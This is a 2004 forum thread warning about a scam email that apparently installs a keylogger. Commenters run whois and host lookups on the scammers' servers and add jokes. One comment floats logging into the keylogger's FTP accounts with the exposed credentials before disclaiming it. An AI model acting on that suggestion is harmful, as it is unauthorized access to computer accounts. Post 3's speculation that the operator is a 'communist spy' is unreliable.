If you're still using Outlook and Internet Explorer, this is a good time to find alternatives (I suggest Firefox and Thunderbird). Crackers and spammers are getting more and more sophisticated, and are finding ways to fool even experienced and skilled computer users.

This page was created in vim by Aman Gupta with no crazy standards compliance in mind, but rather a desire to write clean, readable and well organized HTML using CSS to make the page look presentable.


TOPICS: Crime/Corruption; Culture/Society; News/Current Events; Technical
Un-smegging-believable. Scam-spammers are lower than ordinary spammers, and I hadn't thought that possible. I still use MS OE, but I'm very careful about what I open, use a firewall, and regularly scan for spyware.
1 posted on 02/18/2004 8:33:01 PM PST by Slings and Arrows

To: Slings and Arrows
Take a look at Thunderbird.
2 posted on 02/18/2004 8:59:51 PM PST by philetus (Keep doing what you always do and you'll keep getting what you always get)

To: Slings and Arrows
Here is your main IP address location:
210.192.42.34

The other registrar info you got from the UK and the US was probably fraudulent from stolen credit cards. Most of this comes from Red China - so it surprises me that this one is from Taiwan - probably a communist spy.

Registrant:
Taiwan Telecommunication Network Services Co., LTD (TTN3-DOM)
8Fl.,No.89,Sung Jen Rd.
Taipei 110
TW

Domain Name: TTN.NET

Administrative Contact:
Wu, Jung (JWI410) jungwu@TTN.COM.TW
Taiwan Telecommunication Network
8Fl.,No.89,Sung Jen Rd.
Taipei, 110
TW
+886-2-87883728 fax: +886-2-87883028

Technical Contact:
Taiwan Telecommunication Network (DR416-ORG) dnsmaster@TTN.COM.TW
8Fl.,No.89,Sung Jen Rd.
Taipei, Taipei
TW
+886-2-87883728 fax: +886-2-87883028

Record expires on 18-Jun-2006.
Record created on 19-Jun-1997.
Database last updated on 19-Feb-2004 00:00:08 EST.

Domain servers in listed order:

DNS.TTN.NET 202.145.138.200
LORD.TTN.NET 202.145.138.136
3 posted on 02/18/2004 9:03:54 PM PST by steplock

Comment #4 Removed by Moderator

To: steplock; happygrl
The author of the post was Mr. Gupta. I posted it to warn Freepers about a potentially dangerous attack on their computers. Steplock, you can contact Mr. Gupta via the source URL for the post. Happygrl, no valentine for me. :-(
5 posted on 02/18/2004 9:09:44 PM PST by Slings and Arrows (Am Yisrael Chai!)

To: happygrl; Happygal
Whoops - a little confusion in my last post!
6 posted on 02/18/2004 9:10:48 PM PST by Slings and Arrows (Am Yisrael Chai!)

To: Slings and Arrows; happygrl
Hmmmm...

I'm thinking some things are not coincidence.

Happygrl...if you want I can represent you.

Slings and Arrows have your people talk to Happygrls people (me)...and we'll see if we can find a match.

7 posted on 02/18/2004 9:13:48 PM PST by Happygal (Le gách dea ghuí)

To: Slings and Arrows
All this sound and fury about "gay marriage", but not one prosecutor with the ambition to pair up a spammer with a poor lonely guy in prison....
8 posted on 02/19/2004 6:12:33 AM PST by steve-b

To: Slings and Arrows
Somebody put some imagination into this one.

The adversting.co.uk domain is owned by ThePlanet in Dallas:

[root@Cherie root]# host adversting.co.uk
adversting.co.uk has address 69.93.33.146
[root@Cherie root]# whois 69.93.33.146@whois.arin.net
[whois.arin.net]

OrgName:    ThePlanet.com Internet Services, Inc.
OrgID:      TPCM
Address:    1333 North Stemmons Freeway
Address:    Suite 110
City:       Dallas
StateProv:  TX
PostalCode: 75207
Country:    US

NetRange:   69.93.0.0 - 69.93.239.255
CIDR:       69.93.0.0/17, 69.93.128.0/18, 69.93.192.0/19, 69.93.224.0/20
NetName:    NETBLK-THEPLANET-BLK-9
NetHandle:  NET-69-93-0-0-1
Parent:     NET-69-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.THEPLANET.COM
NameServer: NS2.THEPLANET.COM
Comment:
RegDate:    2003-11-19
Updated:    2004-01-21

And one of those FTP servers for the keylogger is in one of their subnets.

[root@Cherie root]# host 69.93.102.218
218.102.93.69.in-addr.arpa domain name pointer 218.69-93-102.reverse.theplanet.com.

The other FTP server is in a subnet owned by these folks:

[root@Cherie root]# whois 64.191.23.212@whois.arin.net
[whois.arin.net]

OrgName:    Network Operations Center Inc.
OrgID:      NOC
Address:    PO Box 591
City:       Scranton
StateProv:  PA
PostalCode: 18501-0591
Country:    US

NetRange:   64.191.0.0 - 64.191.127.255
CIDR:       64.191.0.0/17
NetName:    HOSTNOC-3BLK
NetHandle:  NET-64-191-0-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.HOSTNOC.NET
NameServer: NS2.HOSTNOC.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2002-05-31
Updated:    2003-08-08

It might be interesting to get into those FTP accounts with the usernames/passwords shown and see what all is in there. (Not that any white-hat hacker like myself would actually do something like that.)

OBTW, Mt. Juliet TN is a suburb of Nashville.

9 posted on 02/19/2004 7:46:28 AM PST by TechJunkYard

To: Cyber Liberty
Ping to self for later read....
10 posted on 02/19/2004 7:51:24 AM PST by Cyber Liberty (© 2003, Ravin' Lunatic since 4/98)

To: steve-b
All this sound and fury about "gay marriage", but not one prosecutor with the ambition to pair up a spammer with a poor lonely guy in prison....

Please let me know if you ever decide to run for State's Attorney. We need this kind of forward-thinking in government.

11 posted on 02/19/2004 8:56:30 AM PST by Slings and Arrows (Am Yisrael Chai!)

To: Happygal; Slings and Arrows
This could turn out to be some kind of foreign affair ;-)
12 posted on 02/19/2004 2:32:36 PM PST by happygrl

To: happygrl; Happygal
This could turn out to be some kind of foreign affair ;-)

I was going to notify the State Department, but nothing kills romance faster than the words "Foggy Bottom."

13 posted on 02/19/2004 3:28:04 PM PST by Slings and Arrows (Am Yisrael Chai!)
